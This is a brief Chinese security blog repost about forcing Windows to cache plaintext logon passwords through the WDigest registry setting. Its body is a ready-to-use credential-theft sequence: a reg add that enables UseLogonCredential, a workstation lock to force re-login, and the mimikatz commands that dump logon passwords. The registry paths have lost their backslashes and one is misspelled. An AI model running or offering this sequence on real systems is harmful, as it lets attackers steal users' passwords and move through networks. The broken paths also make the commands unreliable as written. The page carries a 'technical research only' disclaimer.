HKLMSYSTEMCurrentControlSetContorlSecurityProvidersWdigest
记录明文密码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
不记录明文密码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
rundll32.exe user32.dll LockWorkStation
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
本文始发于微信公众号(XG小刚):修改WDigest获取明文密原理
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论